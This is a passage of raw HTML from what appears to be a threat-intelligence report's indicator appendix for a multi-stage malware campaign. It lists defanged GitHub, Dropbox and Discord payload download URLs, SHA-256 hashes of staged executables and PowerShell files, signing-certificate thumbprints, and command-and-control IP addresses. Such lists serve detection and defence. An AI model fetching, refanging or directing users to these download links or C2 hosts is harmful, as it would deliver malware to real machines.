readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/g1lsetup\/v2025<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/git2312now\/DownNew152\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/muhammadshahblis\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/Jimelecar<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/kloserw<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/kopersparan\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/zotokilowa<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/colvfile\/bmx84542<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/colvfile\/yesyes333<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/mp3andmovies\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/anatfile\/newl<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/downloadprov\/www<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/abdfilesup\/readyyes<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/898537481<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/898072392\/&nbsp;<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/902107140<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/902405338<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901430321\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903047306\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/899121225<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/899472962\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/900979287\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901553970<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901617842\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/897657726<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903499100\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903509708\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/915668132\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>DropBox URL<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"2\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>&nbsp;<em>hxxps:\/\/uc8ce1a0cf2efa109cd4540c0c22.dl.dropboxusercontent[.]com\/cd\/0\/get\/CgHUWBzFWtX1ZE6CwwKXVb1EvW4tnDYYhbX8Iqj70VZ5e2uwYlkAq6V-xQcjX0NMjbOJrN3_FjuanOjW66WdjPHNw2ptSNdXZi4Sey6511OjeNGuzMwxtagHQe5qFOFpY2xyt1sWeMfLwwHkvGGFzcKY\/file?dl=1#&nbsp;<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Discord URL<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1.5\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>hxxps:\/\/cdn.discordapp[.]com\/attachments\/1316109420995809283\/1316112071376769165\/NativeApp_G4QLIQRa.exe<\/em><\/td>\n<td>&nbsp;URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First stage GitHub-hosted payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"28\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NanoPhanoTool.exe<\/em><em><\/em><\/td>\n<td>cd207b81505f13d46d94b08fb5130ddae52bd1748856e6b474688e590933a718<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Squarel_JhZjXa.exe<\/em><em><\/em><\/td>\n<td>b87ff3da811a598c284997222e0b5a9b60b7f79206f8d795781db7b2abd41439<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PriceApp_1jth1MMk.exe<\/em><em><\/em><\/td>\n<td>ef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fef<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Paranoide.exe<\/em><em><\/em><\/td>\n<td>5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AliasApp.exe<\/em><em><\/em><\/td>\n<td>0c2d5b2a88a703df4392e060a7fb8f06085ca3e88b0552f7a6a9d9ef8afdda03<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>X-essentiApp.exe<\/em><em><\/em><\/td>\n<td>d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>QilawatProtone.exe<\/em><em><\/em><\/td>\n<td>823d37f852a655088bb4a81d2f3a8bfd18ea4f31e7117e5713aeb9e0443ccd99<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ElectronApp.exe<\/em><em><\/em><\/td>\n<td>588071382ac2bbff6608c5e7f380c8f85cdd9e6df172c5edbdfdb42eb74367dc<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_dRRgoZqi.exe<\/em><em><\/em><\/td>\n<td>dd8ce4a2fdf4af4d3fc4df88ac867efb49276acdcacaecb0c91e99110477dbf2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_G5L1NHZZ.exe<\/em><em><\/em><\/td>\n<td>380920dfcdec5d7704ad1af1ce35feba7c3af1b68ffa4588b734647f28eeabb7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_86hwwNjq.exe<\/em><em><\/em><\/td>\n<td>96cc7c9fc7ffbda89c920b2920327a62a09f8cb4fcf400bbfb02de82cdd8dba1<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_01C02RhQ.exe<\/em><em><\/em><\/td>\n<td>800c5cd5ec75d552f00d0aca42bdade317f12aa797103b9357d44962e8bcd37a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>App_aeIGCY3g.exe<\/em><em><\/em><\/td>\n<td>afdc1a1e1e934f18be28465315704a12b2cd43c186fbee94f7464392849a5ad0<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Pictore.exe<\/em><em><\/em><\/td>\n<td>de6fcdf58b22a51d26eacb0e2c992d9a894c1894b3c8d70f4db80044dacb7430<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ScenarioIT.exe<\/em><em><\/em><\/td>\n<td>f677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CiscoProton.exe<\/em><em><\/em><\/td>\n<td>7b88f805ed46f4bfc3aa58ef94d980ff57f6c09b86c14afa750fc41d32b7ada8<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Alarmer.exe<\/em><em><\/em><\/td>\n<td>dc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620f<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AevellaAi.2.exe<\/em><em><\/em><\/td>\n<td>3e8ef8ab691f2d5b820aa7ac805044e5c945d8adcfc51ee79d875e169f925455<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>avs.exe<\/em><em><\/em><\/td>\n<td>d2e9362ae88a795e6652d65b9ae89d8ff5bdebbfec8692b8358aa182bc8ce7a4<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>mrg.exe<\/em><em><\/em><\/td>\n<td>113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>mrg.exe<\/em><em><\/em><\/td>\n<td>732b4874ac1a1d4326fc1d71d16910fce2835ceb87e76ad4ef2e40b1e948a6cc<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><em><\/em><\/td>\n<td>aea0892bf9a533d75256212b4f6eaede2c4c9e47f0725fc3c61730ccfba25ec8<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><em><\/em><\/td>\n<td>ea2e21d0c09662a0f9b42d95ce706b5ed26634f20b9b5027ec681635a4072453<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SalmonSamurai.exe<\/em><em><\/em><\/td>\n<td>83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Arendada.exe<\/em><em><\/em><\/td>\n<td>47ef2b7e8f35167fab1ecdd5ddb73d41e40e6a126f4da7540c1c0394195cb3df<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Arduino.exe<\/em><em><\/em><\/td>\n<td>92d457b286fb63d2f5ec9413fd234643448c5f8d2c0763e43ed5cf27ab47eb02<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SecondS.exe<\/em><em><\/em><\/td>\n<td>9d5c551f076449af0dbd7e05e1c2e439d6f6335b3dd07a8fa1b819c250327f39<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ultraedit.msi<\/em><em><\/em><\/td>\n<td>0e20bea91c3b70259a7b6eef3bff614ce9b6df25e078bc470bfef9489c9c76e6<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First-stage Dropbox-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>App_File-x38.3.exe<\/em><em><\/em><\/td>\n<td>c0bc1227bdc56fa601c1c5c0527a100d7c251966e40b2a5fa89b39a2197dda67<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First-stage Discord-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_G4QLIQRa.exe<\/em><em><\/em><\/td>\n<td>87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Certificate signatures of GitHub-hosted payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"11\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>c855f7541e50c98a5ae09f840fa06badb97ab46c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>94c21e6384f2ffb72bd856c1c40b788f314b5298<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>74df2582af3780d81a8071e260c2b04259efc35a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>07728484b1bb8702a87c6e5a154e0d690af2ff38<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>901f3fe4e599cd155132ce2b6bf3c5f6d1e0387c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>be7156bd07dd7f72521fae4a3d6f46c48dd2ce9e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>686b7ebba606303b5085633fcaa0685272b4d9b9<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>74a8215a54f52f792d351d66bd56a0ac626474fb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>561620a3f0bf4fb96898a99252b85b00c468e5af<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>8137f599ac036b0eaae9486158e40e90ebdbce94<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>E9007755cfe5643d18618786de1995914098307f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Certificate signature of Dropbox-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>&nbsp;fa6146f1fdad58b8db08411c459cb70acf82846d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Second-stage payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"24\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NanoTool.exe<\/em><\/td>\n<td>9f958b85dc42ac6301fe1abfd4b11316b637c0b8c0bf627c9b141699dc18e885<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Squarel.exe<\/em><\/td>\n<td>29539039c19995d788f24329ebb960eaf5d86b1f8df76272284d08a63a034d42<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ParanoidResolver.exe<\/em><\/td>\n<td>1f73a00b5a7ac31ffc89abbedef17ee2281cf065423a3644787f6c622295ff29<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AliasInstall.exe<\/em><\/td>\n<td>997671c13bb78a9acc658e2c3a1abf06aedc4f1f4f1e5fd8d469a912fc93993b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>IoNixNginx.exe<\/em><\/td>\n<td>1d8ab53874b2edfb058dd64da8a61d92c8a8e302cc737155e0d718dbe169ba36<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>QilawatProton.exe&nbsp;<\/em><\/td>\n<td>885f8a704f1b3aaa2c4ddf7eab779d87ecb1290853697a1e6fb6341c4f825968<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ProtonEditor.exe<\/em><\/td>\n<td>48f422bf2b878d142f376713a543d113e9f964f6761d15d4149a4d71441739e5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AlEditor.exe&nbsp;<\/em><\/td>\n<td>9daa63046978d7097ea20bfbb543d82374cf44ba37f966b87488f63daf20999e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Scielfic.exe<\/em><\/td>\n<td>6ec86b4e200144084e07407200a5294985054bdaddb3d6c56358fc0657e48157<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Pictore.exe<\/em><\/td>\n<td>18959833da3df8d5d8d19c3fce496c55aa70140824d3a942fe43d547b9a8c065<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AlarmWalker Solid.exe<\/em><\/td>\n<td>552f23590bdf301f481e62a9ce3c279bab887d64f4ba3ea3d81a348e3eff6c45<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Aevella.exe&nbsp;<\/em><\/td>\n<td>2a738f41b42f47b64be7dc2d16a4068472b860318537b5076814891a7d00b3bb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><\/td>\n<td>5b50d0d67db361da72af2af20763b0dde9e5e86b792676acb9750f32221e955c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ArchiverApp.exe<\/em><\/td>\n<td>cfeac95017edbfe9a0ad8f24e7539f54482012d11dc79b7b6f41ff4ff742d9c6<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>LakerBaker.exe<\/em><\/td>\n<td>af7454ca632dead16a36da583fb89f640f70df702163f5a22ba663e985f80d88<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NanoTool.exe<\/em><\/td>\n<td>efdcd37ee0845e0145084c2a10432e61b1b4bf6b44ecd41d61a54b10e3563650<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DisplayPhotoViewer.exe<\/em><\/td>\n<td>86ae0078776c0411504cf97f4369512013306fcf568cc1dc7a07e180dde08eda<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>CheryLady Application.exe<\/em><\/td>\n<td>773d3cb5edef063fb5084efcd8d9d7ac7624b271f94706d4598df058a89f77fd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SalmonSamurai.exe<\/em><\/td>\n<td>40abba1e7da7b3eaad08a6e3be381a9fc2ab01b59638912029bc9a4aa1e0c7a7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Heaveen Application.exe<\/em><\/td>\n<td>39dbf19d5c642d48632bfaf2f83518cfbd2b197018642ea1f2eb3d81897cf17d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Cisco Application.exe<\/em><\/td>\n<td>234971ecd1bf152c903841fac81bdaa288954a2757a73193174cde02fa6f937b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Simplify.exe<\/em><\/td>\n<td>221615de3d66e528494901fb5bd1725ecda336af33fe758426295f659141b931<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SecondS.tmp<\/em><\/td>\n<td>5185f953be3d0842416d679582b233fdc886301441e920cb9d11642b3779d153<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Second-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>159.100.18[.]192<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>192.142.10[.]246<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>79.133.46[.]35<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>84.200.24[.]191<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>84.200.24[.]26<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>89.187.28[.]253<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>185.92.181[.]1<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>188.245.94[.]250<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Third-stage payloads: <em>.exe<\/em> and PowerShell files<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"55\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ApproachAllan.exe<\/em><\/td>\n<td>4e5fafffb633319060190a098b9ea156ec0243eb1279d78d27551e507d937947<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DiscoConvicted.exe<\/em><\/td>\n<td>008aed5e3528e2c09605af26b3cda88419efb29b85ed122cab59913c18f7dc75<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AwesomeTrader.exe<\/em><\/td>\n<td>21d4252a6492270f24282f8de9e985c9b8c61412f42d169ff4b128fd689d4753<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CiteLips.exe<\/em><\/td>\n<td>c9713c06526673bf18dbdaf46ea61ca9dd8fefe8ceec3be06c63db17e01e3741<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RepublicChoir.exe<\/em><\/td>\n<td>f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>6Zh7MvxYtHTBFX90Mn.exe<\/em><\/td>\n<td>b96360d48c2755ded301dd017b37dfdce921bdea7731c4b31958d945c8a0b8f5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ExclusivePottery.exe<\/em><\/td>\n<td>54c8a4f58b548c0cf6dbea2522e258723263ccde11d23e48985bdd1fd3535ce2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>squarel.ps1<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>MadCountries.exe<\/em><\/td>\n<td>9fe2c00641ece18898267b3c6e4ee0cb82ffefbc270c0767c441c3f38b63a12a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HockeyTract.exe<\/em><\/td>\n<td>f136fa82ff73271708afe744f4e6a19cd5039e08ecd3ddad8e4d238f338f4d58<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BruneiPlugins.exe<\/em><\/td>\n<td>453de65c9cc2dc62a67c502cd8bc26968acad9a671c1e095312c1fa6db4a7c74<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CnnCylinder.exe<\/em><\/td>\n<td>a76548a500d81dbb6f50419784a9b0323f5e42245ac7067af2adee0558167116<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>specreal.ps1<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>InflationWinston.exe<\/em><\/td>\n<td>dfbba64219fc63815db538ae8b51e07ec7132f4b39ba4a556c64bd3a5f024c2d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>netsup.ps1&nbsp;<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CfUltra.exe<\/em><\/td>\n<td>7880714c47260dba1fd4a4e4598e365b2a5ed0ad17718d8d192d28cf75660584<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CalvinShoppercom.exe<\/em><\/td>\n<td>345a898d5eab800b7b7cbd455135c5474c5f0a9c366df3beb110f225ba734519<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EscortUnavailable.exe<\/em><\/td>\n<td>258efd913cccdb70273c9410070f093337d5574b74c683c1cdff33baff9ffd7c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DisagreeProceed.exe<\/em><\/td>\n<td>9c82a2190930ec778688779a5ad52537d8b0856c8142c71631b308f1f8f0e772<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BarbieBiblical.exe<\/em><\/td>\n<td>34f43bfc0a6f0d0f70b6eee0fa29c6dc62596ab2b867bbabd27c68153ea47f24<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>MysqlManaging.exe<\/em><\/td>\n<td>ef1f9d507a137a4112ac92c576fc44796403eb53d71fe2ddb00376419c8a604e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PillsHarvest.exe<\/em><\/td>\n<td>4af3898ba3cf8b420ea1e6c5ce7cdca7775a4c9b78f67b493a9c73465432f1d3<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BelfastProt.exe<\/em><\/td>\n<td>ad470bffbd120fc3a6c2c2e52af3c12f9f0153e76fee5e2b489a3d1870bdff03<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HowardLikelihood.exe<\/em><\/td>\n<td>cc08892ace9ac746623b9d0178cd4d149f6a9ab10467fb9059d16f2c0038dcf9<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SorryRequiring.exe<\/em><\/td>\n<td>4a2346d453b2ac894b67625640347c15e74e3091a9aa15629c3a808caaff1b2b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SearchMed.exe<\/em><\/td>\n<td>b0aab51b5e4a9cdd5b3d2785e4dea1ec06b20bc00e4015ccd79e0ba395a20fbd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RepublicChoir.exe<\/em><\/td>\n<td>f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DesignersCrawford.exe<\/em><\/td>\n<td>e8452a65a452abdb4b2e629f767a038e0792e6e2393fb91bf17b27a0ce28c936<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>HumanitarianProvinces.exe<\/em><\/td>\n<td>25cfd6e6a9544990093566d5ea9d7205a60599bfda8c0f4d59fca31e58a7640b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ResetEngaging.exe<\/em><\/td>\n<td>51fbc196175f4fb9f38d843ee53710cde943e5caf1b0552624c7b65e6c231f7e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EducationalDerby.exe<\/em><\/td>\n<td>4a9a8c46ff96e4f066f51ff7e64b1c459967e0cdeb74b6de02cf1033e31c1c7b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>StringsGrill.exe<\/em><\/td>\n<td>f2a8840778484a56f1215f0fa8f6e8b0fb805fce99e62c01ff0a1f541f1d6808<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>CongressionalMechanics.exe<\/em><\/td>\n<td>2060509a63180c2f5075faf88ce7079c48903070c1c6b09fa3f9d6db05b8d9da<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SexuallyWheat.exe<\/em><\/td>\n<td>d39075915708d012f12b7410cd63e19434d630b2b7dbe60bd72ce003cd2efeaf<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PerceptionCircuits.exe<\/em><\/td>\n<td>0e7dd3aa100d9e22d367cb995879ac4916cb4feb1c6085e06139e02cc7270bba<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>WWv63SKrHflebBd4VW.ps1<\/em><\/td>\n<td>483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>WritingsShanghai.exe<\/em><\/td>\n<td>fa131ea3ce9a9456e1d37065c7f7385ce98ffa329936b5fdd0fd0e78ade88ecb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>IUService.exe<\/em><\/td>\n<td>d5a6714ab95caa92ef1a712465a44c1827122b971bdb28ffa33221e07651d6f7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RttHlp.exe<\/em><\/td>\n<td>8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ASmartService.exe<\/em><\/td>\n<td>75712824b916c1dc8978f65c060340dc69b1efa0145dddbf54299689b9f4a118<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ClaireSpecifically.exe<\/em><\/td>\n<td>746abef4bde48da9f9bff3c23dd6edf8f1bea4b568df2a7d369cb30536ec9ce0<\/td>\n<\/tr>\n<tr 